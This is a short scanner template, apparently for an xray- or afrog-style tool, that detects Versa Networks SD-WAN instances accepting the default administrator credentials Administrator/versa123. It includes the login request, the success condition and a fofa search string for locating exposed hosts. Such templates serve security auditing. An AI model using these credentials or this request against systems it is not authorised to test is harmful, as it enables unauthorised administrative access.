id: versa-default-password

info:
  name: Versa Networks SD-WAN Application Default Login
  author: davidmckennirey
  severity: high
  verified: true
  description: fofa "Versa Networks"

rules:
  r0:
    request:
      method: POST
      path: /versa/login
      body: username=Administrator&password=versa123&sso=systemRadio
    expression: |
      response.status == 302 && response.headers["location"].contains("/versa/app/index.html") && response.raw_header.bcontains(b'JSESSIONID=')
expression: r0()